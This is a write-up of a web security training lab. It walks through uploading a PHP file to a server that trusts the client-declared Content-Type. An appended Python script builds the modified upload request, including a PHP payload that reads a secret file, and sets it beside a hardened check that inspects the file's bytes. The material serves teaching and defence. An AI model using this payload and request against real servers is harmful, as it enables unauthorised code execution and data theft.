Hello guys, how are you all? This is our second article about file upload vulnerabilities. In this article, we will upload a web shell via a Content-Type restriction bypass.
This means that when we upload our malicious file with a .php extension in this lab, the server responds with an error saying that only JPEG/PNG files can be uploaded. The catch is that the server makes that decision from the Content-Type header of the uploaded file part, and that header is set by the client. We will intercept the upload request, change the Content-Type to image/jpeg or image/png, and add our payload.
The lab description tells us that the file upload function of this lab is vulnerable and that we have to exploit it to read the /home/carlos/secret file. We have also been given login credentials for the lab: wiener:peter.
Here is the lab description. As you may know, these are PortSwigger Web Security Academy labs that we are solving.
To begin, access the lab and log in. Once logged in, enable Burp's proxy. With the proxy running, upload any simple image through the upload form. After the upload, look at the HTTP history in the Proxy tab.
Exploiting the Vulnerability
As you can see, there are two important requests. One is a POST request in which we uploaded our sample.png image. The other is a GET request that fetches the image back from the server, which tells us where uploaded files end up.
We will send both of these requests to Repeater. We will name the POST request "UploadImage" and the GET request "ShowImage".
If you remember, I told you earlier that when we try to upload our myexploit.php file in this lab, the server rejects it because of the Content-Type restriction. There are two ways to get around this. The first is to upload myexploit.php directly, intercept the request, and change the Content-Type of the file part to image/png or image/jpeg.
In my case, I take the second route and trick the server with the request I already have. The POST request that uploaded sample.png already carries Content-Type: image/png, so I do not have to touch that header at all; I only modify the rest of that request.
First, I change filename="sample.png" in the Content-Disposition header to filename="myexploit.php".
After that, I remove all the raw image data that sits below the Content-Type line of the file part.
In its place I insert my PHP payload, which does what the lab asks for: it reads the /home/carlos/secret file.
This is the payload I have inserted above. Now I will submit this request.
After sending the request, I switch to my second tab, ShowImage.
If you remember, we uploaded the payload with the name "myexploit.php". In the ShowImage request, we simply replace "sample.png" in the path with "myexploit.php". The server executes the PHP file instead of serving it as an image, and the response contains the secret, which can be seen in the screenshot above.
After submitting the secret in the lab, you can see that we have solved it. Congratulations!
To continue studying, check out the next lab, Web Shell Upload via Path Traversal, but cover the current lab before moving on. Good luck!
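The whole procedure above, as an added example that is not part of the original post or of the lab's own code: a script that builds the same modified "UploadImage" request (filename changed to myexploit.php, image data replaced by the PHP payload, Content-Type left as image/png) so it can be pasted into Repeater, and beside it a tiny server-side view of the upload showing why the lab's check passes the file while a check on the actual bytes and extension would not. The multipart boundary, the form field names ("avatar", "user"), the host, the path /my-account/avatar and the session cookie are assumptions for the example; take the real values from the intercepted request in Burp.

```python
import re
from typing import Dict, List

# Boundary and field names are constructed for this example; copy the real ones
# from the intercepted "UploadImage" request in Burp.
BOUNDARY = "----WebKitFormBoundaryExample123"

# The lab objective: make the server read /home/carlos/secret for us.
PHP_PAYLOAD = "<?php echo file_get_contents('/home/carlos/secret'); ?>"

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"


def build_upload_body(filename: str, declared_type: str, data: bytes,
                      boundary: str = BOUNDARY) -> bytes:
    """Build a multipart/form-data body like the browser's image upload.

    filename, declared_type and data are all attacker-controlled; the lab
    server only looks at declared_type.
    """
    b = boundary.encode()
    lines = [
        b"--" + b,
        b'Content-Disposition: form-data; name="avatar"; filename="'
        + filename.encode() + b'"',
        b"Content-Type: " + declared_type.encode(),
        b"",
        data,
        b"--" + b,
        b'Content-Disposition: form-data; name="user"',
        b"",
        b"wiener",
        b"--" + b + b"--",
        b"",
    ]
    return b"\r\n".join(lines)


def parse_multipart(body: bytes, boundary: str) -> List[Dict]:
    """Minimal server-side view of the body: one dict per part (headers + data)."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode().partition(":")
            headers[name.strip().lower()] = value.strip()
        if data.endswith(b"\r\n"):
            data = data[:-2]  # CRLF that precedes the next delimiter
        parts.append({"headers": headers, "data": data})
    return parts


def vulnerable_check(part: Dict) -> bool:
    """What the lab server does: trust the client-supplied Content-Type header."""
    return part["headers"].get("content-type") in ("image/jpeg", "image/png")


def hardened_check(part: Dict) -> bool:
    """Check the extension and the leading bytes; ignore the declared type."""
    cd = part["headers"].get("content-disposition", "")
    m = re.search(r'filename="([^"]*)"', cd)
    name = m.group(1) if m else ""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    data = part["data"]
    if ext == "png":
        return data.startswith(PNG_MAGIC)
    if ext in ("jpg", "jpeg"):
        return data.startswith(JPEG_MAGIC)
    return False


def build_raw_request(host: str, path: str, cookie: str, body: bytes,
                      boundary: str = BOUNDARY) -> bytes:
    """Full HTTP/1.1 request, ready to paste into Burp Repeater."""
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode() + body


if __name__ == "__main__":
    body = build_upload_body("myexploit.php", "image/png", PHP_PAYLOAD.encode())
    # Host, path and session cookie are placeholders; take them from Burp.
    print(build_raw_request("YOUR-LAB-ID.web-security-academy.net",
                            "/my-account/avatar", "session=REPLACE_ME", body).decode())
    part = parse_multipart(body, BOUNDARY)[0]
    print("Content-Type check passes:", vulnerable_check(part))  # True
    print("magic-byte check passes:", hardened_check(part))      # False
```

Running it prints the raw request; after sending it, request the uploaded name in the "ShowImage" tab exactly as described above. The hardened_check function only closes the bypass used in this lab: a PNG with PHP appended after a valid header would still pass it, so a real upload handler should also store files under a server-chosen name and never execute anything from the upload directory.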